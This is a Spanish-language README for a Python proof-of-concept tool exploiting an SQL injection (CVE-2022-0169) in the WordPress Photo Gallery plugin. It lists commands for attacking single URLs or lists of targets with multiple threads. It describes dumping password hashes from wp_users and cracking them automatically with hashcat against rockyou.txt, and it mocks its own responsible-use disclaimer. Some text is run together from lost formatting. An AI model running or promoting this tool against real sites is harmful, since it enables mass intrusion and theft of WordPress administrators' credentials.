
CVE-2022-0169 - WordPress Photo Gallery SQLi PoC
Este es un proof-of-concept (PoC) sencillo en Python para CVE-2022-0169, una vulnerabilidad de inyección SQL en el plugin WordPress Photo Gallery.
admin-ajax.phpwp_usersEsta herramienta es solo para fines educativos. ¡Úsala con responsabilidad! Como si escucharas esto.. 😆
python3 exploit.py -u http://target.com
python3 exploit.py -f targets.txt
Ejemplo:
python3 exploit.py -u http://victim.com -w /usr/share/wordlists/rockyou.txt
Requisitos
requests
argparse
colorama
results/YYYYMMDD_HHMMSS/Cuando se encuentren hashes, se te preguntará:
Crack the hashes with hashcat now? [Y/N]:
Si pulsas Y, hashcat se ejecutará automáticamente usando la wordlist seleccionada.
results/ para ver los volcados y hashes.hashcat -m 400 -a 0 results/YYYYMMDD_HHMMSS/hashes.txt /usr/share/wordlists/rockyou.txt
Esta herramienta es solo para pruebas educativas y autorizadas. Eres el único responsable de cómo la uses. Siempre obtén permiso antes de escanear o explotar cualquier sistema.
Mantente cyberpunk.
— X3RX3S
| Option | Description |
|---|
-u | URL de un solo objetivo |
-f | Archivo con lista de objetivos |
-p | Proxy (p. ej., http://127.0.0.1:8080) |
-t | Número de hilos (predeterminado: 5) |
-w | Elige la wordlist para hashcat (predeterminado: rockyou.txt) ¡Asegúrate de que rockyou.txt esté descomprimido! |